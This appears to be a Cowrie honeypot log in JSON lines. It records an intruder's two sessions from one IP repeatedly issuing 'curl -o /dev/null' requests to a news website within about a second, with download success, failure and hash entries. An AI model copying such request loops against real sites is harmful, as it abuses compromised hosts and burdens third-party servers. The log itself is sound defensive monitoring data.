{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.455670Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.458805Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.460646Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.489491Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.490958Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.504493Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.505478Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.507996Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.508905Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.529266Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.530974Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.550281Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.551085Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.552872Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.553740Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.569136Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.571065Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.594355Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.595410Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.598597Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.599527Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.638544Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.639867Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.642477Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.643595Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.683472Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.684675Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.687930Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.688920Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.730174Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.732091Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.744744Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.745859Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.748457Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.749373Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.782034Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.783989Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.787003Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.787848Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.790408Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.791265Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.827497Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.828645Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.830760Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.833507Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.835285Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.836902Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.868900Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.870734Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.871681Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.874253Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.902999Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.904144Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.916154Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.917260Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.925662Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.926558Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.947023Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.948073Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.959143Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.960363Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.967904Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.968834Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.990292Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.991276Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.004572Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.007477Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.010469Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.011413Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.030784Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.031829Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.049025Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.050080Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.055858Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.057752Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.071024Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.072027Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.086029Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.087105Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.105111Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.106309Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.110707Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.111712Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.121203Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.122119Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.142951Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.147355Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.147942Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.150554Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.152614Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.154291Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.158181Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.159363Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.167588Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.186273Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.188272Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.231941Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.233474Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.278552Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.279801Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.282612Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.311007Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.312170Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.318232Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.320153Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.322057Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.323131Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.366702Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.376043Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.377297Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.379830Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:17.382741Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:17.384116Z","src_ip":"212.227.125.160","session":"7541ed730449"}
